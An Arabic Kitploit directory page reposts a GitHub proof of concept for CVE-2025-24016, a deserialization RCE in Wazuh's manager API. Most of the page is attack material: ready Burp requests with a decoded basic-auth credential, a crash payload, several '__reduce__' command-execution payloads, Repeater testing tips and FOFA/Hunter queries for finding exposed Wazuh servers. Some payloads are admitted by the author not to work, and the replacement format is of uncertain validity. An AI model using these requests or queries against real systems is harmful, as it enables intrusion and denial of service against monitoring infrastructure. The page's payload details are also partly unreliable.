Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC — تم تحديد ثغرة RCE حرجة في خادم Wazuh بسبب إلغاء التسلسل غير الآمن في حزمة wazuh-manager. تؤثر هذه الثغرة على إصدارات Wazuh ≥ 4.4.0 وتم إصلاحها في الإصدار 4.9.1. | Kitploit
أدوات/GitHubGitHub/cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubcybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC

تم تحديد ثغرة RCE حرجة في خادم Wazuh بسبب إلغاء التسلسل غير الآمن في حزمة wazuh-manager. تؤثر هذه الثغرة على إصدارات Wazuh ≥ 4.4.0 وتم إصلاحها في الإصدار 4.9.1.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

🚨 Wazuh - تنفيذ التعليمات البرمجية عن بُعد (RCE) - PoC

📌 ملخص الثغرة

تم تحديد ثغرة حرجة من نوع RCE في خادم Wazuh بسبب إلغاء تسلسل غير آمن في حزمة wazuh-manager. تؤثر هذه الثغرة على إصدارات Wazuh ≥ 4.4.0 وتم إصلاحها في الإصدار 4.9.1.

🔍 التفاصيل

تكمن الثغرة في DistributedAPI الخاص بواجهة Wazuh API، حيث يتم إلغاء تسلسل المدخلات التي يتحكم بها المستخدم بطريقة غير آمنة. وهذا يسمح للمهاجمين الذين لديهم وصول إلى API (مثل لوحة تحكم أو عقدة عنقودية مخترقة) بتنفيذ أكواد Python تعسفية على الخادم الرئيسي باستخدام نقطة النهاية run_as.

📬 إثبات المفهوم (طلب Burp)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

📌 ترويسة Authorization هي ترميز base64 لـ wazuh-wui:MyS3cr37P450r.*-.

📌 تُسبب الحمولة إيقاف تشغيل خادم Wazuh عبر استدعاء دالة exit() في Python.

💥 الأثر

  • تنفيذ كامل للتعليمات البرمجية عن بُعد عبر API
  • إيقاف تشغيل الخادم في إثبات المفهوم (DoS)
  • خطر الحركة الجانبية عبر عناقيد Wazuh

🛡️ التخفيف

  • ✅ قم بالترقية إلى Wazuh v4.9.1 أو أحدث
  • 🚫 تجنّب تعريض API خارجيًا
  • 🧪 راقب نشاط API غير المعتاد

✅ مثال على حمولة لتشغيل whoami

root@kitploit:~
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}

لكن هذا وحده لن يعمل ما لم يقم كود إلغاء التسلسل فعليًا بتنفيذ شجرة الكائنات. بدلاً من ذلك، استخدم كائنًا قائمًا على __reduce__ ينفذ التعليمات البرمجية.

إليك الصيغة الصحيحة لـ طلب Burp باستخدام os.system() في Python عبر منطق شبيه بـ pickle:

💣 حمولة Burp العاملة لـ RCE (تنفيذ أكواد Python)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}

🧬 لتشغيل ls، غيّر الحمولة إلى:

root@kitploit:~
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}

يمكنك أيضًا استخدام:

root@kitploit:~
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}

⚠️ ملاحظة: يجب أن يتم إلغاء التسلسل الفعلي عبر eval() أو آليات مشابهة في الواجهة الخلفية لكي يعمل هذا. بناءً على إثبات المفهوم الخاص بـ Wazuh، هذا ممكن بالفعل إذا كنت تتحكم في auth_context.

🔐 نصيحة احترافية اعترض الطلب في Burp، وانتقل إلى تبويب Repeater، واختبر عدة حمولات مثل:

  • "whoami"
  • "id"
  • "uname -a"
  • "ls /home/wazuh"

👇 الاستعلامات

  • HUNTER : product.name="Wazuh"
  • FOFA : app="Wazuh"

إذا كانت الاستجابة فارغة أو كان الحالة 500، تحقق من السجلات — ففي بعض الأحيان لا يتم إرجاع المخرجات. 📚 ابقوا متمرّسين، أيها الهاكرز! المزيد من إثباتات المفهوم (PoCs) لمكافآت الثغرات، والتجاوزات (bypasses)، والحمولات (payloads) قادمة قريبًا!

تابع 👉 @cybersecplayground للمحتوى اليومي حول الاختراق!

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit

تنزيل الأداة